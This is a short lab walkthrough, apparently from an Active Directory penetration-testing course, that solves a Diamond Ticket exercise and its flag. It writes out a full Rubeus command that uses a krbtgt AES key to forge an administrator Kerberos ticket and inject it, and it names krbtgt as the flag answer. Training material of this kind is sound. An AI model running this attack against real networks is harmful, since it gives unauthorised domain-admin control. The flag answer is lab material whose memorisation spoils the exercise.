10 - LO1️0️

Learning Object 10

Tasks

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

Solutions

1 - Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack

Run a new shell as administrator and use the following Rubeus command to execute the Diamond Ticket attack:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Using the new process started, access the DC using winrs:

Flag 19 [dcorp-dc] - Name of the account whose secrets are used for the Diamond Ticket attack 🚩

Krbtgt's secrets are used for the Diamond Ticket attack.

Last updated